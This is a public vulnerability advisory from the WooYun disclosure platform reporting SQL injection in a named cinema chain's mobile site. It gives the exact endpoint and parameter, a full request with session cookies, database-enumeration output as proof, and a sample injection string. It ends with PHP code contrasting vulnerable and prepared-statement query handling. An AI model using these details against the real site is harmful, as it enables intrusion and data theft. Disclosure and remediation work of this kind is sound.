
Vulnerability summary

Defect ID: wooyun-2015-0163329

Title: SQL injection on the Xingmei International Cineplex mobile-site server

Vendor: Xingmei mobile site

Author: seck

Submitted: 2015-12-21 22:12

Fixed: 2016-02-04 17:47

Published: 2016-02-04 17:47

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: vendor could not be contacted or actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-21: Vendor contacted, awaiting acknowledgement; details withheld from the public
2016-02-04: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The Xingmei International Cineplex mobile-site server has a SQL injection vulnerability.

Detailed description:

The injection point is the cinema_id parameter of the showings lookup endpoint (marked with * below):

GET /include/showing_ajax.php?cinema_id=*&date_str=2015-12-20&film_id_str=001105952015,001205952015,001405952015,001905952015&op=get_search_showing_list&return_type=json HTTP/1.1
Cookie: Hm_lpvt_636ba4c238f25f3f8b5fe3c8aad97ded=1450615961; Hm_lvt_636ba4c238f25f3f8b5fe3c8aad97ded=1450615961; _cityid=1001; _selectCinema_id=XM20003402; _selectCinema_aid=108693; PHPSESSID=i7ijhp9hpqq3mav1hkgbvunh97
Host: m.ixingmei.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


Proof of vulnerability:

available databases [24]:
[*] cms
[*] information_schema
[*] mysql
[*] performance_schema
[*] pl_account_db
[*] pl_ad_db
[*] pl_app_db
[*] pl_common_db
[*] pl_general_db
[*] pl_hot_db
[*] pl_im_db
[*] pl_image_db
[*] pl_mc_db
[*] pl_mobile
[*] pl_movie_db
[*] pl_openfire_db
[*] pl_quartz_db
[*] pl_sender_db
[*] pl_star_db
[*] pl_user_db
[*] pl_visit_db
[*] sns
[*] ucenter
[*] webistrano_development




Remediation:

Filter the input.

Copyright notice: please credit seck@WooYun when reposting.
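To make the remediation concrete, here is an added example (not the reporter's or the vendor's code) of a hypothetical handler for the request above, first in the vulnerable string-concatenation form and then hardened with parameter allow-listing and PDO prepared statements. Table and column names (tc_showing, show_date, hall_id, start_time, price) and the DSN are assumptions; the comma-separated film_id_str is handled with one placeholder per element, since a single bound "?" cannot express an IN list.

```php
<?php
// Added example, not the vendor's code. Parameter names come from the request on
// the page; table/column names and the DSN below are assumptions.

// Vulnerable pattern: request values spliced straight into SQL (do not use).
function vulnerableShowingSql(array $get): string {
    $films = array_map(fn($f) => "'$f'", explode(',', $get['film_id_str'] ?? ''));
    return "SELECT * FROM tc_showing WHERE cinema_id = '" . ($get['cinema_id'] ?? '') . "'"
         . " AND show_date = '" . ($get['date_str'] ?? '') . "'"
         . " AND film_id IN (" . implode(',', $films) . ")";
}

// Hardened: native prepared statements (emulation off) plus strict input shapes.
function connectDb(): PDO {
    return new PDO('mysql:host=127.0.0.1;dbname=pl_mobile;charset=utf8mb4', 'app', 'secret', [
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side binding, not client escaping
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

function safeShowingList(PDO $db, array $get): array {
    // cinema_id on the page is alphanumeric (e.g. XM20003402): allow only that shape.
    if (!preg_match('/^[A-Za-z0-9]{1,20}$/', $get['cinema_id'] ?? '')) {
        throw new InvalidArgumentException('bad cinema_id');
    }
    // date_str must be a real calendar date in Y-m-d form (round-trip check rejects 2015-13-40).
    $date = DateTime::createFromFormat('Y-m-d', $get['date_str'] ?? '');
    if (!$date || $date->format('Y-m-d') !== ($get['date_str'] ?? '')) {
        throw new InvalidArgumentException('bad date_str');
    }
    // film_id_str is a comma list of numeric ids; validate each element and cap the count.
    $filmIds = explode(',', $get['film_id_str'] ?? '');
    if (count($filmIds) > 50) {
        throw new InvalidArgumentException('too many film ids');
    }
    foreach ($filmIds as $f) {
        if (!preg_match('/^\d{1,20}$/', $f)) {
            throw new InvalidArgumentException('bad film_id_str');
        }
    }
    // One "?" per list element; the values themselves never touch the SQL text.
    $marks = implode(',', array_fill(0, count($filmIds), '?'));
    $stmt = $db->prepare(
        "SELECT film_id, hall_id, start_time, price FROM tc_showing
         WHERE cinema_id = ? AND show_date = ? AND film_id IN ($marks)"
    );
    $stmt->execute(array_merge([$get['cinema_id'], $get['date_str']], $filmIds));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

With the validation in place a request carrying cinema_id=XM20003402' OR 1=1-- is rejected before any query is built, and even a value that passes the regex is bound as data rather than interpreted as SQL.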


Vulnerability response

Vendor response:

Vendor could not be contacted or actively declined the report.

Vulnerability Rank: 8 (WooYun assessment)